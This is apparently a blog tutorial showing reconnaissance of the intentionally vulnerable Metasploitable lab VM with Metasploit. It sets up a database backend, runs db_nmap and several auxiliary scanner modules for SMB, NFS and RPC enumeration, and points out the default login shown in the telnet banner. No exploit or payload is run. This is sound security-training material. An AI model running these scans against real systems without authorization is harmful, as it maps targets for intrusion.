Adeptus-Mechanicus

Main
Codex
Librarium Whitehat
Advisories
Blog Pics
"Inveniam viam aut faciam" : I will either find a way, or I shall make one


METASPLOITABLE MODEL ANSWER

Previously we went through setting up an attack and a target virtual machine (see here) with the target machine being 'metasploitable'. This target was developed to help people use metasploit, so lets see how much we can do using that tool.

Lets start by setting up a postgresql DB on Kali for use with metasploit. We do this as using a database as the metasploit backend makes life very easy.
root@kali:~# su postgres
postgres@kali:/root$ createuser msf -P
Enter password for new role:   ---> for our example we will use msf as the password
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@kali:/root$ createdb --owner=msf msfdb

Once that is done you can use the 'db_...' commands. The first time you connect to the empty database, metasploit will create all the tables it needs
#msfconsole
msf > db_status
[*] postgresql selected, no connection

msf > db_connect msf:msf@127.0.0.1/msfdb
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
....snip...
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_platforms_pkey" for table "module_platforms"
NOTICE:  CREATE TABLE will create implicit sequence "exploit_attempts_id_seq" for serial column "exploit_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploit_attempts_pkey" for table "exploit_attempts"
[*] Rebuilding the module cache in the background...
msf > load db_tracker


  The best place to start is to use the 'db_nmap' command. This will run nmap with any options you give it and import the results into the database for use..
msf > db_nmap -A 10.10.10.200
[*] Nmap: Starting Nmap 6.25 ( http://nmap.org ) at 2013-06-05 21:31 EDT
[*] Nmap: 'mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers'
[*] Nmap: Nmap scan report for 10.10.10.200
[*] Nmap: Host is up (0.0013s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T13:07:45+00:00
[*] Nmap: |_Not valid after:  2010-04-16T13:07:45+00:00
[*] Nmap: |_ssl-date: 2013-06-05T21:34:00+00:00; -3h59m58s from local time.
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_  bind.version: 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      37697/tcp  mountd
[*] Nmap: |   100005  1,2,3      58662/udp  mountd
[*] Nmap: |   100021  1,3,4      55980/udp  nlockmgr
[*] Nmap: |   100021  1,3,4      59689/tcp  nlockmgr
[*] Nmap: |   100024  1          37965/udp  status
[*] Nmap: |_  100024  1          54441/tcp  status
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell?
[*] Nmap: 1099/tcp open  rmiregistry GNU Classpath grmiregistry
[*] Nmap: |_rmi-dumpregistry: Registry listing failed (No return data received from server)
[*] Nmap: 1524/tcp open  ingreslock?
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info: Protocol: 10
[*] Nmap: | Version: 5.0.51a-3ubuntu5
[*] Nmap: | Thread ID: 27
[*] Nmap: | Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
[*] Nmap: | Status: Autocommit
[*] Nmap: |_Salt: U8Z<[7?vX5@~{n5^Y'QD
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: |   Protocol version: 3.3
[*] Nmap: |   Security types:
[*] Nmap: |_    Unknown security type (33554432)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: | irc-info: Server: irc.Metasploitable.LAN
[*] Nmap: | Version: Unreal3.2.8.1. irc.Metasploitable.LAN
[*] Nmap: | Lservers/Lusers: 0/1
[*] Nmap: | Uptime: 5 days, 11:55:45
[*] Nmap: | Source host: DEA2FB80.5CD59B7.59935C67.IP
[*] Nmap: |_Source ident: OK nmap
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-favicon: Apache Tomcat
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
[*] Nmap: |_http-title: Apache Tomcat/5.5
[*] Nmap: 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
[*] Nmap: SF-Port514-TCP:V=6.25%I=7%D=6/5%Time=51AFE679%P=i686-pc-linux-gnu%r(NULL,3
[*] Nmap: SF:3,"\x01getnameinfo:\x20Temporary\x20failure\x20in\x20name\x20resolution
[*] Nmap: SF:\n");
[*] Nmap: ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
[*] Nmap: SF-Port1524-TCP:V=6.25%I=7%D=6/5%Time=51AFE67F%P=i686-pc-linux-gnu%r(NULL,
[*] Nmap: SF:17,"root@metasploitable:/#\x20")%r(GenericLines,73,"root@metasploitable
[*] Nmap: SF::/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20root@metaspl
[*] Nmap: SF:oitable:/#\x20root@metasploitable:/#\x20")%r(GetRequest,428,"root@metas
[*] Nmap: SF:ploitable:/#\x20<HTML>\n<HEAD>\n<TITLE>Directory\x20/</TITLE>\n<BASE\x2
[*] Nmap: SF:0HREF=\"file:/\">\n</HEAD>\n<BODY>\n<H1>Directory\x20listing\x20of\x20/
[*] Nmap: SF:</H1>\n<UL>\n<LI><A\x20HREF=\"\./\">\./</A>\n<LI><A\x20HREF=\"\.\./\">\
[*] Nmap: SF:.\./</A>\n<LI><A\x20HREF=\"bin/\">bin/</A>\n<LI><A\x20HREF=\"boot/\">bo
[*] Nmap: SF:ot/</A>\n<LI><A\x20HREF=\"cdrom/\">cdrom/</A>\n<LI><A\x20HREF=\"dev/\">
[*] Nmap: SF:dev/</A>\n<LI><A\x20HREF=\"etc/\">etc/</A>\n<LI><A\x20HREF=\"home/\">ho
[*] Nmap: SF:me/</A>\n<LI><A\x20HREF=\"initrd/\">initrd/</A>\n<LI><A\x20HREF=\"initr
[*] Nmap: SF:d\.img\">initrd\.img</A>\n<LI><A\x20HREF=\"lib/\">lib/</A>\n<LI><A\x20H
[*] Nmap: SF:REF=\"lost%2Bfound/\">lost\+found/</A>\n<LI><A\x20HREF=\"media/\">media
[*] Nmap: SF:/</A>\n<LI><A\x20HREF=\"mnt/\">mnt/</A>\n<LI><A\x20HREF=\"nohup\.out\">
[*] Nmap: SF:nohup\.out</A>\n<LI><A\x20HREF=\"opt/\">opt/</A>\n<LI><A\x20HREF=\"proc
[*] Nmap: SF:/\">proc/</A>\n<LI><A\x20HREF=\"root/\">root/</A>\n<LI><A\x20HREF=\"sbi
[*] Nmap: SF:n/\">sbin/</A>\n<LI><A\x20HREF=\"srv/\">srv/</A>\n<LI><A\x20HREF=\"sys/
[*] Nmap: SF:\">sys/</A>\n<LI><A\x20HREF=\"tmp/\">tmp/</A>\n<LI><A\x20HREF=\"usr/\">
[*] Nmap: SF:usr/</A>\n<LI><A\x20HREF=\"var/\">var/</A>\n<LI><A\x20HREF=\"vmlinuz\">
[*] Nmap: SF:vmlinuz</A>\n<")%r(HTTPOptions,94,"root@metasploitable:/#\x20bash:\x20O
[*] Nmap: SF:PTIONS:\x20command\x20not\x20found\nroot@metasploitable:/#\x20root@meta
[*] Nmap: SF:sploitable:/#\x20root@metasploitable:/#\x20root@metasploitable:/#\x20")
[*] Nmap: SF:%r(RTSPRequest,94,"root@metasploitable:/#\x20bash:\x20OPTIONS:\x20comma
[*] Nmap: SF:nd\x20not\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x2
[*] Nmap: SF:0root@metasploitable:/#\x20root@metasploitable:/#\x20")%r(RPCCheck,17,"
[*] Nmap: SF:root@metasploitable:/#\x20")%r(DNSVersionBindReq,17,"root@metasploitabl
[*] Nmap: SF:e:/#\x20")%r(DNSStatusRequest,17,"root@metasploitable:/#\x20")%r(Help,6
[*] Nmap: SF:3,"root@metasploitable:/#\x20bash:\x20HELP:\x20command\x20not\x20found\
[*] Nmap: SF:nroot@metasploitable:/#\x20root@metasploitable:/#\x20")%r(SSLSessionReq
[*] Nmap: SF:,51,"root@metasploitable:/#\x20bash:\x20{O\?G,\x03Sw=:\x20command\x20no
[*] Nmap: SF:t\x20found\nroot@metasploitable:/#\x20");
[*] Nmap: MAC Address: 08:00:27:6A:57:59 (Cadmus Computer Systems)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   NetBIOS computer name:
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2013-06-05T17:34:00-04:00
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   1.29 ms 10.10.10.200
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 188.56 seconds
msf > 

Here is an example of querying the database to get a listing of services..
msf > services 
 
Services
========
 
host          port  proto  name         state  info
----          ----  -----  ----         -----  ----
10.10.10.200  21    tcp    ftp          open   vsftpd 2.3.4
10.10.10.200  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.10.10.200  23    tcp    telnet       open   Linux telnetd
10.10.10.200  25    tcp    smtp         open   Postfix smtpd
10.10.10.200  53    tcp    domain       open   ISC BIND 9.4.2
10.10.10.200  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.10.10.200  111   tcp    rpcbind      open   2 RPC #100000
10.10.10.200  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.10.10.200  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.10.10.200  512   tcp    exec         open   netkit-rsh rexecd
10.10.10.200  513   tcp    login        open   
10.10.10.200  514   tcp    shell        open   
10.10.10.200  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
10.10.10.200  1524  tcp    ingreslock   open   
10.10.10.200  2049  tcp    nfs          open   2-4 RPC #100003
10.10.10.200  2121  tcp    ftp          open   ProFTPD 1.3.1
10.10.10.200  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.10.10.200  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.10.10.200  5900  tcp    vnc          open   VNC protocol 3.3
10.10.10.200  6000  tcp    x11          open   access denied
10.10.10.200  6667  tcp    irc          open   Unreal ircd
10.10.10.200  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.10.10.200  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Useful. But lets see if we cannot get some more detail on that list. For example..
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
 
Module options (auxiliary/scanner/smb/smb_version):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

Now here is another way to use the database. Using the 'hosts' command you can use 'hosts -R' and it will put the hosts in the database into the RHOSTS variable for you to use..
msf auxiliary(smb_version) > hosts -R
 
Hosts
=====
 
address       mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----  -------  ---------  -----  -------  ----  --------
10.10.10.200  08:00:27:6A:57:59        Linux    Ubuntu            server         
 
RHOSTS => 10.10.10.200
 
msf auxiliary(smb_version) > show options
 
Module options (auxiliary/scanner/smb/smb_version):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.10.10.200     yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads
 
msf auxiliary(smb_version) > run
 
[*] 10.10.10.200:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Once that is done, lets query for our services list again..
Services
========
 
host          port  proto  name         state  info
----          ----  -----  ----         -----  ----
10.10.10.200  21    tcp    ftp          open   vsftpd 2.3.4
10.10.10.200  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.10.10.200  23    tcp    telnet       open   Linux telnetd
10.10.10.200  25    tcp    smtp         open   Postfix smtpd
10.10.10.200  53    tcp    domain       open   ISC BIND 9.4.2
10.10.10.200  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.10.10.200  111   tcp    rpcbind      open   2 RPC #100000
10.10.10.200  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.10.10.200  445   tcp    smb          open   Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
10.10.10.200  512   tcp    exec         open   netkit-rsh rexecd
10.10.10.200  513   tcp    login        open   
10.10.10.200  514   tcp    shell        open   
10.10.10.200  1099  tcp    rmiregistry  open   GNU Classpath grmiregistry
10.10.10.200  1524  tcp    ingreslock   open   
10.10.10.200  2049  tcp    nfs          open   2-4 RPC #100003
10.10.10.200  2121  tcp    ftp          open   ProFTPD 1.3.1
10.10.10.200  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.10.10.200  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.10.10.200  5900  tcp    vnc          open   VNC protocol 3.3
10.10.10.200  6000  tcp    x11          open   access denied
10.10.10.200  6667  tcp    irc          open   Unreal ircd
10.10.10.200  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.10.10.200  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

As you can see, the details around port 445 have now been updated. So lets move forward using the following..
msf> use auxiliary/scanner/telnet/telnet_version
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/misc/sunrpc_portmapper
msf> use auxiliary/scanner/netbios/nbname
msf> use auxiliary/scanner/smb/pipe_auditor
msf> use auxiliary/scanner/smb/smb2
msf> use auxiliary/scanner/smb/smb_enumshares
msf> use auxiliary/scanner/smb/smb_lookupsid
msf> use auxiliary/scanner/nfs/nfsmount
msf> use auxiliary/admin/http/tomcat_administration
msf> use auxiliary/scanner/misc/java_rmi_server

Once we have run through all of those modules, our services list should look like this..
msf> services
 
Services
========
 
host          port   proto  name         state  info
----          ----   -----  ----         -----  ----
10.10.10.200  21     tcp    ftp          open   vsftpd 2.3.4
10.10.10.200  22     tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.10.10.200  23     tcp    telnet       open   _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
10.10.10.200  25     tcp    smtp         open   220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
10.10.10.200  53     tcp    domain       open   ISC BIND 9.4.2
10.10.10.200  80     tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.10.10.200  111    udp    rpcbind      open   2 RPC #100000
10.10.10.200  111    tcp    rpcbind      open   Prog: 100000 Version: 2 - via portmapper
10.10.10.200  137    udp    netbios      open   METASPLOITABLE:<00>:U :METASPLOITABLE:<03>:U :METASPLOITABLE:<20>:U :
__MSBROWSE__:<01>:G :WORKGROUP:<00>:G :WORKGROUP:<1d>:U :WORKGROUP:<1e>:G :00:00:00:00:00:00
10.10.10.200  139    tcp    smb          open   Samba smbd 3.X workgroup: WORKGROUP
10.10.10.200  445    tcp    smb          open   Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
10.10.10.200  512    tcp    exec         open   netkit-rsh rexecd
10.10.10.200  513    tcp    login        open   
10.10.10.200  514    tcp    shell        open   
10.10.10.200  1099   tcp    java-rmi     open   GNU Classpath grmiregistry
10.10.10.200  1524   tcp    ingreslock   open   
10.10.10.200  2049   udp    nfs          open   2-4 RPC #100003
10.10.10.200  2049   tcp    nfs          open   Prog: 100003 Version: 4 - via portmapper
10.10.10.200  2121   tcp    ftp          open   ProFTPD 1.3.1
10.10.10.200  3306   tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.10.10.200  5432   tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.10.10.200  5900   tcp    vnc          open   VNC protocol version 3.3
10.10.10.200  6000   tcp    x11          open   access denied
10.10.10.200  6667   tcp    irc          open   Unreal ircd
10.10.10.200  8009   tcp    ajp13        open   Apache Jserv Protocol v1.3
10.10.10.200  8180   tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.10.10.200  37697  tcp    mountd       open   Prog: 100005 Version: 3 - via portmapper
10.10.10.200  37965  udp    status       open   1 RPC #100024
10.10.10.200  54441  tcp    status       open   Prog: 100024 Version: 1 - via portmapper
10.10.10.200  55980  udp    nlockmgr     open   1-4 RPC #100021
10.10.10.200  58662  udp    mountd       open   1-3 RPC #100005
10.10.10.200  59689  tcp    nlockmgr     open   Prog: 100021 Version: 4 - via portmapper

A lot more detail, in fact, if you look at the telnet banner, you will see we have a username and password already. We can also look at what we get by using the 'notes' command to query the database..
msf> notes
[*] Time: 2013-06-06 01:34:38 UTC Note: host=10.10.10.200 type=nmap.nse.nbstat.host data={"output"=>"NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>"}
[*] Time: 2013-06-06 01:34:38 UTC Note: host=10.10.10.200 type=nmap.nse.smb-os-discovery.host data={"output"=>"\n  OS: Unix (Samba 3.0.20-Debian)\n  NetBIOS computer name: \n  Workgroup: WORKGROUP\n  System time: 2013-06-05T17:34:00-04:00\n"}
[*] Time: 2013-06-06 01:34:39 UTC Note: host=10.10.10.200 service=ftp type=nmap.nse.ftp-anon.tcp.21 data={"output"=>"Anonymous FTP login allowed (FTP code 230)"}
[*] Time: 2013-06-06 01:34:39 UTC Note: host=10.10.10.200 service=ssh type=nmap.nse.ssh-hostkey.tcp.22 data={"output"=>"1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)"}
[*] Time: 2013-06-06 01:34:39 UTC Note: host=10.10.10.200 service=smtp type=nmap.nse.smtp-commands.tcp.25 data={"output"=>"metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, "}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=smtp type=nmap.nse.ssl-cert.tcp.25 data={"output"=>"Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX\nNot valid before: 2010-03-17T13:07:45+00:00\nNot valid after:  2010-04-16T13:07:45+00:00"}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=smtp type=nmap.nse.ssl-date.tcp.25 data={"output"=>"2013-06-05T21:34:00+00:00; -3h59m58s from local time."}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=domain type=nmap.nse.dns-nsid.tcp.53 data={"output"=>"\n  bind.version: 9.4.2\n"}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=http type=nmap.nse.http-methods.tcp.80 data={"output"=>"No Allow or Public header in OPTIONS response (status code 200)"}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=http type=nmap.nse.http-title.tcp.80 data={"output"=>"Metasploitable2 - Linux"}
[*] Time: 2013-06-06 01:34:40 UTC Note: host=10.10.10.200 service=rpcbind type=nmap.nse.rpcinfo.tcp.111 data={"output"=>"\n  program version   port/proto  service\n  100000  2            111/tcp  rpcbind\n  100000  2            111/udp  rpcbind\n  100003  2,3,4       2049/tcp  nfs\n  100003  2,3,4       2049/udp  nfs\n  100005  1,2,3      37697/tcp  mountd\n  100005  1,2,3      58662/udp  mountd\n  100021  1,3,4      55980/udp  nlockmgr\n  100021  1,3,4      59689/tcp  nlockmgr\n  100024  1          37965/udp  status\n  100024  1          54441/tcp  status\n"}
[*] Time: 2013-06-06 01:34:41 UTC Note: host=10.10.10.200 service=rmiregistry type=nmap.nse.rmi-dumpregistry.tcp.1099 data={"output"=>"Registry listing failed (No return data received from server)"}
[*] Time: 2013-06-06 01:34:42 UTC Note: host=10.10.10.200 service=mysql type=nmap.nse.mysql-info.tcp.3306 data={"output"=>"Protocol: 10\nVersion: 5.0.51a-3ubuntu5\nThread ID: 27\nSome Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection\nStatus: Autocommit\nSalt: U8Z<[7?vX5@~{n5^Y'QD\n"}
[*] Time: 2013-06-06 01:34:42 UTC Note: host=10.10.10.200 service=vnc type=nmap.nse.vnc-info.tcp.5900 data={"output"=>"\n  Protocol version: 3.3\n  Security types:\n    Unknown security type (33554432)\n"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 service=irc type=nmap.nse.irc-info.tcp.6667 data={"output"=>"Server: irc.Metasploitable.LAN\nVersion: Unreal3.2.8.1. irc.Metasploitable.LAN \nLservers/Lusers: 0/1\nUptime: 5 days, 11:55:45\nSource host: DEA2FB80.5CD59B7.59935C67.IP\nSource ident: OK nmap\n"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 service=ajp13 type=nmap.nse.ajp-methods.tcp.8009 data={"output"=>"Failed to get a valid response for the OPTION request"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 service=http type=nmap.nse.http-favicon.tcp.8180 data={"output"=>"Apache Tomcat"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 service=http type=nmap.nse.http-methods.tcp.8180 data={"output"=>"No Allow or Public header in OPTIONS response (status code 200)"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 service=http type=nmap.nse.http-title.tcp.8180 data={"output"=>"Apache Tomcat/5.5"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 type=host.os.nmap_fingerprint data={:os_vendor=>"Linux", :os_family=>"Linux", :os_version=>"2.6.X", :os_accuracy=>100}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 type=host.last_boot data={:time=>"Fri May 31 09:42:20 2013"}
[*] Time: 2013-06-06 01:34:43 UTC Note: host=10.10.10.200 type=host.nmap.traceroute data={"port"=>0, "proto"=>"", "hops"=>[{"ttl"=>"1", "ipaddr"=>"10.10.10.200", "rtt"=>"1.29", "name"=>nil}]}
[*] Time: 2013-06-06 01:51:09 UTC Note: host=10.10.10.200 service=smb type=smb.fingerprint data={:os_flavor=>"Unix", :os_name=>"Unknown", :os_sp=>"Samba 3.0.20-Debian", :SMBDomain=>"WORKGROUP"}
[*] Time: 2013-06-06 02:20:15 UTC Note: host=10.10.10.200 service=smb type=Pipes Founded data="Pipes: \\netlogon, \\lsarpc, \\samr, \\eventlog, \\lsass, \\ntsvcs, \\srvsvc, \\wkssvc"
[*] Time: 2013-06-06 02:22:16 UTC Note: host=10.10.10.200 service=smb type=smb.shares data={:shares=>[["print$", "DISK", "Printer Drivers"], ["tmp", "DISK", "oh noes!"], ["opt", "DISK", ""], ["IPC$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"], ["ADMIN$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"]]}
[*] Time: 2013-06-06 02:29:32 UTC Note: host=10.10.10.200 service=smb type=smb.domain.lookupsid data={:name=>"METASPLOITABLE", :txt_sid=>"5-21-1042354039-2475377354-766472396", :users=>{500=>"Administrator", 501=>"nobody", 1000=>"root", 1002=>"daemon", 1004=>"bin", 1006=>"sys", 1008=>"sync", 1010=>"games", 1012=>"man", 1014=>"lp", 1016=>"mail", 1018=>"news", 1020=>"uucp", 1026=>"proxy", 1066=>"www-data", 1068=>"backup", 1076=>"list", 1078=>"irc", 1082=>"gnats", 1200=>"libuuid", 1202=>"dhcp", 1204=>"syslog", 1206=>"klog", 1208=>"sshd", 1210=>"bind", 1212=>"postfix", 1214=>"ftp", 1216=>"postgres", 1218=>"mysql", 1220=>"tomcat55", 1222=>"distccd", 1224=>"telnetd", 1226=>"proftpd", 1228=>"statd", 1230=>"snmp", 3000=>"msfadmin", 3002=>"user", 3004=>"service"}, :groups=>{512=>"Domain Admins", 513=>"Domain Users", 514=>"Domain Guests", 1001=>"root", 1003=>"daemon", 1005=>"bin", 1007=>"sys", 1009=>"adm", 1011=>"tty", 1013=>"disk", 1015=>"lp", 1017=>"mail", 1019=>"news", 1021=>"uucp", 1025=>"man", 1027=>"proxy", 1031=>"kmem", 1041=>"dialout", 1043=>"fax", 1045=>"voice", 1049=>"cdrom", 1051=>"floppy", 1053=>"tape", 1055=>"sudo", 1059=>"audio", 1061=>"dip", 1067=>"www-data", 1069=>"backup", 1075=>"operator", 1077=>"list", 1079=>"irc", 1081=>"src", 1083=>"gnats", 1085=>"shadow", 1087=>"utmp", 1089=>"video", 1091=>"sasl", 1093=>"plugdev", 1101=>"staff", 1121=>"games", 1201=>"users", 1203=>"libuuid", 1205=>"dhcp", 1207=>"syslog", 1209=>"klog", 1211=>"scanner", 1213=>"nvram", 1215=>"fuse", 1217=>"crontab", 1219=>"mlocate", 1221=>"ssh", 1223=>"lpadmin", 1225=>"admin", 1227=>"bind", 1229=>"ssl-cert", 1231=>"postfix", 1233=>"postdrop", 1235=>"postgres", 1237=>"mysql", 1239=>"sambashare", 1241=>"telnetd", 3001=>"msfadmin", 3003=>"user", 3005=>"service"}}
[*] Time: 2013-06-06 02:39:07 UTC Note: host=10.10.10.200 service=nfs type=nfs.exports data={:exports=>[["/", ["*"]]]}
